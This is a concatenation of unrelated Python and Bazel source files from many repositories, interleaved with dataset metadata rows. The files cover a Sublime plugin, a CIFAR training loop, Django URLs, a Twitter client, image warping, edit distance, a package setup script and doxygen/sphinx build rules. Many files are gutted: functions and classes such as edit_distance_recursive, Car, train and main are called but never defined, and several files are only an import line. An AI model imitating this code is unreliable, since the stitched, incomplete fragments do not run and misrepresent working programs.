The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---------------------
Original code has been heavily modifed by Isaac Muse <isaacmuse@gmail.com> for the ExportHtml project.
Algorithm has been split out into a separate library and been enhanced with a number of features.
"""
from __future__ import absolute_import
import sublime
import re
from .rgba import RGBA
from os import path
from collections import namedtuple
from plistlib import readPlistFromBytes
def sublime_format_path(pth):
"""Format path for sublime internal use."""
m = re.match(r"^([A-Za-z]{1}):(?:/|\\)(.*)", pth)
if sublime.platform() == "windows" and m is not None:
pth = m.group(1) + "/" + m.group(2)
return pth.replace("\\", "/")
| 43.985714 | 120 | 0.60531 |
629f16a424f010c4c41e887a5a673cd1324c487c | 820 | py | Python | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | import re
# if __name__ == "__main__":
# a = Node(1, "192.168.1.300", 1, 1)
# a.validate()
| 28.275862 | 132 | 0.540244 |
629facc04419dcfc8b14e0e646d18577710d3fd8 | 134 | py | Python | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | from random import *
l = []
for i in range(50):
l.append(randint(1, 100))
print(l)
for i in range(len(l)):
l[i] **= 2
print(l) | 16.75 | 29 | 0.58209 |
62a017f4ec169c103d6b2ccf1047abf661d12ee5 | 827 | py | Python | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | import math | 28.517241 | 60 | 0.436518 |
62a043b5cf107ad3ad2080e48c27d0e71c339360 | 4,232 | py | Python | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | import os
import random
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision.datasets import CIFAR100, CIFAR10
from tqdm import tqdm
from config import *
from models.resnet import ResNet18
from data.transform import Cifar
random.seed('KMU_AELAB')
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
transforms = Cifar()
if DATASET == 'cifar10':
data_train = CIFAR10('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR10('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR10('./data', train=False, download=True, transform=transforms.test_transform)
elif DATASET == 'cifar100':
data_train = CIFAR100('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR100('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR100('./data', train=False, download=True, transform=transforms.test_transform)
else:
raise FileExistsError
if __name__ == '__main__':
for trial in range(TRIALS):
fp = open(f'record_{trial + 1}.txt', 'w')
indices = list(range(NUM_TRAIN))
random.shuffle(indices)
labeled_set = indices[:INIT_CNT]
unlabeled_set = indices[INIT_CNT:]
train_loader = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
test_loader = DataLoader(data_test, batch_size=BATCH)
dataloaders = {'train': train_loader, 'test': test_loader}
model = ResNet18(num_classes=CLS_CNT).cuda()
torch.backends.cudnn.benchmark = False
for cycle in range(CYCLES):
criterion = nn.CrossEntropyLoss().cuda()
optimizer = optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WDECAY)
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=MILESTONES)
train(model, criterion, optimizer, scheduler, dataloaders, EPOCH)
acc = test(model, dataloaders, mode='test')
fp.write(f'{acc}\n')
print('Trial {}/{} || Cycle {}/{} || Label set size {}: Test acc {}'.format(trial + 1, TRIALS, cycle + 1,
CYCLES, len(labeled_set), acc))
random.shuffle(unlabeled_set)
labeled_set += unlabeled_set[:ADDENDUM]
unlabeled_set = unlabeled_set[ADDENDUM:]
dataloaders['train'] = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
fp.close()
| 32.553846 | 119 | 0.629962 |
62a2a70bfd5dba6090a4f4d7e8ad09c40c0c9748 | 1,284 | py | Python | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | import sys
from nexentaedge.utils import get_sid
from nexentaedge.nedgeConfigurator import NedgeMgmtConfigurator
from utils import get_iface_name_by_mac_from_list
from utils import get_deployment_config
if __name__ == '__main__':
main()
| 29.181818 | 79 | 0.63785 |
62a3ad6a413be7104ebcc620eae261f63aeb9314 | 1,234 | py | Python | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.contrib.auth import views
from . import views
urlpatterns = [
#Custom login view
# url(r'^login/$', views.user_login, name='login'),
#Builtin login view
url(r'^login/$', auth_views.login, name='login'),
url(r'^edit/$', views.edit, name='edit'),
url(r'^logout/$', auth_views.logout, name='logout'),
url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
url(r'^$', views.dashboard, name='dashboard'),
url(r'^password_change/$', auth_views.password_change, name='password_change'),
url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
url(r'^register/$', views.register, name='register'),
]
| 51.416667 | 143 | 0.71799 |
62a3b336bd6bebedcff30395fd32342d7e3cb1c2 | 10,195 | py | Python | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | 1 | 2015-11-08T12:46:28.000Z | 2015-11-08T12:46:28.000Z | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
def show_public(twitter):
print "## Public timeline ##"
for tweet in twitter.public_timeline():
print unicode(tweet)
if __name__ == '__main__':
sys.exit(main())
| 32.059748 | 114 | 0.665326 |
62a5341859cb97bf208e99d03085417e4406b355 | 1,119 | py | Python | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG | 31.971429 | 93 | 0.669348 |
62a6aa5f52b205b9fb58d93a1dc26a90e2c69fff | 5,224 | py | Python | hathor/transaction/aux_pow.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 51 | 2019-12-28T03:33:27.000Z | 2022-03-10T14:03:03.000Z | hathor/transaction/aux_pow.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 316 | 2019-09-10T09:20:05.000Z | 2022-03-31T20:18:56.000Z | hathor/transaction/aux_pow.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 19 | 2020-01-04T00:13:18.000Z | 2022-02-08T21:18:46.000Z | # Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, NamedTuple
from structlog import get_logger
from hathor import protos
logger = get_logger()
| 41.460317 | 105 | 0.647205 |
62a6cdcc5cf9bca5a11b6dc4e9f38e91015abe52 | 502 | py | Python | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 423 | 2015-01-06T02:46:46.000Z | 2022-03-23T17:20:38.000Z | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 243 | 2015-01-03T02:10:03.000Z | 2022-03-31T19:29:48.000Z | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 136 | 2015-03-23T20:35:59.000Z | 2022-03-09T13:39:10.000Z | from .save_views import save_3d_views
from .panels import plot_panels
from ._default_params import (
params_inflatedless_lateral_medial_ventral,
params_flatmap_lateral_medial,
params_occipital_triple_view,
params_inflated_dorsal_lateral_medial_ventral,
)
__all__ = [
"save_3d_views",
"plot_panels",
"params_flatmap_lateral_medial",
"params_occipital_triple_view",
"params_inflatedless_lateral_medial_ventral",
"params_inflated_dorsal_lateral_medial_ventral",
]
| 27.888889 | 52 | 0.804781 |
62a72c2067d3b5d382112ffdbd4e31435a1725b9 | 1,456 | py | Python | pyfr/plugins/dtstats.py | DengSonic/PyFR | dde524ed56f4a4feca376b51db4b21eb6fa4b113 | [
"BSD-3-Clause"
] | 1 | 2020-06-23T16:37:06.000Z | 2020-06-23T16:37:06.000Z | pyfr/plugins/dtstats.py | synthetik-technologies/PyFR | 9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda | [
"BSD-3-Clause"
] | null | null | null | pyfr/plugins/dtstats.py | synthetik-technologies/PyFR | 9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda | [
"BSD-3-Clause"
] | 1 | 2020-08-21T02:50:17.000Z | 2020-08-21T02:50:17.000Z | # -*- coding: utf-8 -*-
from pyfr.mpiutil import get_comm_rank_root
from pyfr.plugins.base import BasePlugin, init_csv
| 29.12 | 76 | 0.581731 |
62a840352bdaa921e3b37484cc7f2c625c055007 | 1,989 | py | Python | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | 3 | 2020-12-24T19:02:19.000Z | 2021-07-17T07:48:54.000Z | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | null | null | null | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | null | null | null | # The source of this script is from:
# https://github.com/TejasNaikk/Image-Alignment-and-Panoramas/blob/master/main.py
import cv2
import numpy as np
import math
'''
Warp an image from cartesian coordinates (x, y) into cylindrical coordinates (theta, h)
Returns: (image, mask)
Mask is [0,255], and has 255s wherever the cylindrical images has a valid value.
Masks are useful for stitching
Usage example:
im = cv2.imread("myimage.jpg",0) #grayscale
h,w = im.shape
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
'''
if __name__ == "__main__":
im = cv2.imread('../data/example-data/flower/1.jpg')
h,w = im.shape[:2]
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
cv2.imshow("test", imcyl[0])
cv2.waitKey()
cv2.destroyAllWindows()
| 29.25 | 87 | 0.581699 |
62a90788c7716583df977b2015db0ceb313c24a8 | 7,490 | py | Python | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | import math
import random
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from fmt.pythonfmt.doubleintegrator import filter_reachable, gen_trajectory, show_trajectory
from fmt.pythonfmt.world import World
# FMTree class
| 40.486486 | 105 | 0.554072 |
62aaf966c075e395977fecf28d9050755afb7dda | 2,338 | py | Python | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | 1 | 2018-06-12T12:00:33.000Z | 2018-06-12T12:00:33.000Z | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | null | null | null | algorithms/edit_distance.py | costincaraivan/cs-refresher | 008fdb2af661310c65f656f017ec34e5df004424 | [
"MIT"
] | null | null | null | # import unittest
import logging
from timeit import timeit
logging.basicConfig(level=logging.INFO)
logging.info(edit_distance_recursive("intention", "execution"))
logging.info(edit_distance_recursive("jackrabbits", "jackhammer"))
logging.info(edit_distance_recursive("ie", "e"))
logging.info(edit_distance_iterative("intention", "execution"))
logging.info(edit_distance_iterative("jackrabbits", "jackhammer"))
logging.info(edit_distance_iterative("ie", "e"))
logging.info(timeit('edit_distance_recursive("intention", "execution")',
setup='from __main__ import edit_distance_recursive', number=100))
logging.info(timeit('edit_distance_iterative("intention", "execution")',
setup='from __main__ import edit_distance_iterative', number=100)) | 27.505882 | 86 | 0.618477 |
62ab97280947669585b79c2c2795dd161b100377 | 2,365 | py | Python | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 2 | 2015-06-15T02:16:33.000Z | 2022-02-23T07:10:38.000Z | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 7 | 2016-05-13T06:39:45.000Z | 2016-05-20T02:55:31.000Z | hybrid_cloud_patches/3rd_lib/python/pyvcloud-11/setup.py | Hybrid-Cloud/badam | 390ad3a6fc03948008f7c04ed2f9fcc8514cc1eb | [
"Apache-2.0"
] | 4 | 2015-11-02T04:02:50.000Z | 2021-05-13T17:06:00.000Z | # VMware vCloud Python SDK
# Copyright (c) 2014 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
import os
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='pyvcloud',
version='11',
description='VMware vCloud Python SDK',
long_description=read('README.rst'),
url='https://github.com/vmware/pyvcloud',
author='VMware, Inc.',
author_email='pgomez@vmware.com',
packages=find_packages(),
install_requires=required,
license='License :: OSI Approved :: Apache Software License',
classifiers=[
'Development Status :: 1 - Planning',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'Intended Audience :: Developers',
'Environment :: No Input/Output (Daemon)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Distributed Computing',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
],
keywords='pyvcloud vcloud vcloudair vmware',
platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],
test_suite='tests',
tests_require=[],
zip_safe=True
)
| 37.539683 | 74 | 0.659197 |
62ac5880cfcb73a7f5f41808ba14ed348ca4e208 | 607 | py | Python | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | net_utils.py | mfatihaktas/edge-load-balance | b866ca47ba37a605eeba05658b1d302f6855a23f | [
"MIT"
] | null | null | null | from debug_utils import *
# TODO: does not work
| 24.28 | 95 | 0.634267 |
62ac8d841db4303175fa7656df2488f0b321c7c1 | 2,086 | py | Python | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | 1 | 2018-10-05T15:12:08.000Z | 2018-10-05T15:12:08.000Z | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | null | null | null | auto.py | fabiaant/Automation-car-generator | aa57f1a69e4c4b1abf123b6bb88863862d43c4eb | [
"MIT"
] | 1 | 2021-08-30T01:18:36.000Z | 2021-08-30T01:18:36.000Z | import random
options = {
"year": {
"start": 1946,
"end": 2020
},
"body": ["Sedan", "Wagon", "Hatchback", "Coupe", "SUV", "Utility", "MPV",
"Convertible", "Van"],
"engine_location": ["front", "mid", "rear"],
"engine_mounting": ["transverse", "longitudinal"],
"drive": ["FWD", "RWD", "AWD", "4x4"],
"engine": {
"aspiration": ["naturally aspirated", "turbocharged"],
"layout": [
{
"Inline-": [3, 4, 5, 6]
},
{
"60 V": [6, 8, 12]
},
{
"90 V": [6, 8, 10]
},
{
"Boxer-": [4, 6]
}
]
}
}
# Make it a class for the fuck of it lol
car = Car()
print("Your next car will be:")
print(car.describe())
input("Press enter to close")
| 27.813333 | 88 | 0.57047 |
62ad2faaa4417f27b1e2dd75edf9e858d937f1c1 | 5,786 | bzl | Python | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 3 | 2019-06-26T14:08:12.000Z | 2020-03-10T06:24:46.000Z | docs.bzl | es-ude/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 31 | 2019-06-10T10:50:58.000Z | 2021-08-06T13:43:54.000Z | docs.bzl | es-uni-due/EmbeddedSystemsBuildScripts | 276c3ca78ba8285cd26c3c10443d89ccc403a69c | [
"MIT"
] | 5 | 2019-07-08T23:33:39.000Z | 2020-10-11T20:35:25.000Z | def _doxygen_archive_impl(ctx):
"""Generate a .tar.gz archive containing documentation using Doxygen.
Args:
name: label for the generated rule. The archive will be "%{name}.tar.gz".
doxyfile: configuration file for Doxygen, @@OUTPUT_DIRECTORY@@ will be replaced with the actual output dir
srcs: source files the documentation will be generated from.
"""
doxyfile = ctx.file.doxyfile
out_file = ctx.outputs.out
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = [
"mkdir -p %s" % out_dir_path,
"out_dir_path=$(cd %s; pwd)" % out_dir_path,
"pushd %s" % doxyfile.dirname,
"""sed -e \"s:@@OUTPUT_DIRECTORY@@:$out_dir_path/:\" <%s | doxygen -""" % doxyfile.basename,
"popd",
"tar czf %s -C %s ./" % (out_file.path, out_dir_path),
]
ctx.actions.run_shell(
inputs = ctx.files.srcs + [doxyfile],
outputs = [out_file],
use_default_shell_env = True,
command = " && ".join(commands),
)
doxygen_archive = rule(
implementation = _doxygen_archive_impl,
attrs = {
"doxyfile": attr.label(
mandatory = True,
allow_single_file = True,
),
"srcs": attr.label_list(
mandatory = True,
allow_files = True,
),
},
outputs = {
"out": "%{name}.tar.gz",
},
)
def _sphinx_archive_impl(ctx):
"""
Generates a sphinx documentation archive (.tar.gz).
The output is called <name>.tar.gz, where <name> is the
name of the rule.
Args:
config_file: sphinx conf.py file
doxygen_xml_archive: an archive that containing the generated doxygen
xml files to be consumed by the breathe sphinx plugin.
Setting this attribute automatically enables the breathe plugin
srcs: the *.rst files to consume
"""
out_file = ctx.outputs.sphinx
out_dir_path = out_file.short_path[:-len(".tar.gz")]
commands = ["mkdir _static"]
inputs = ctx.files.srcs
if ctx.attr.doxygen_xml_archive != None:
commands = commands + [
"mkdir xml",
"tar -xzf {xml} -C xml --strip-components=2".format(xml = ctx.file.doxygen_xml_archive.path),
]
inputs.append(ctx.file.doxygen_xml_archive)
commands = commands + [
"sphinx-build -M build ./ _build -q -b html -C {settings}".format(
settings = _sphinx_settings(ctx),
out_dir = out_dir_path,
),
]
commands = commands + [
"tar czf %s -C _build/build/ ./" % (out_file.path),
]
ctx.actions.run_shell(
use_default_shell_env = True,
outputs = [out_file],
inputs = inputs,
command = " && ".join(commands),
)
sphinx_archive = rule(
implementation = _sphinx_archive_impl,
attrs = {
"srcs": attr.label_list(
mandatory = True,
allow_files = True,
),
"doxygen_xml_archive": attr.label(
default = None,
allow_single_file = True,
),
"master_doc": attr.string(default = "contents"),
"version": attr.string(
mandatory = True,
),
"project": attr.string(
default = "",
),
"copyright": attr.string(default = ""),
"extensions": attr.string_list(default = [
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
]),
"templates": attr.string_list(default = []),
"source_suffix": attr.string_list(default = [".rst"]),
"exclude_patterns": attr.string_list(default = ["_build", "Thumbs.db", ".DS_Store"]),
"pygments_style": attr.string(default = ""),
"language": attr.string(default = ""),
"html_theme": attr.string(default = "sphinx_rtd_theme"),
"html_theme_options": attr.string_dict(default = {}),
"html_static_path": attr.string_list(default = ["_static"]),
"html_sidebars": attr.string_dict(default = {}),
"intersphinx_mapping": attr.string_dict(default = {}),
},
outputs = {
"sphinx": "%{name}.tar.gz",
},
) | 37.816993 | 114 | 0.610093 |
62ae8dd259b43e9f8c27ede31598aad711abeea2 | 234 | py | Python | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 13 | 2020-09-13T16:50:28.000Z | 2022-03-22T20:49:54.000Z | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 10 | 2020-06-27T12:34:38.000Z | 2022-01-03T12:15:42.000Z | patches/reduceRNG.py | muffinjets/LADXR | bbd82a5b7bac015561bb6a4cfe1c5fa017f827f5 | [
"MIT"
] | 18 | 2020-05-29T17:48:04.000Z | 2022-02-08T03:36:08.000Z | from assembler import ASM
| 23.4 | 88 | 0.636752 |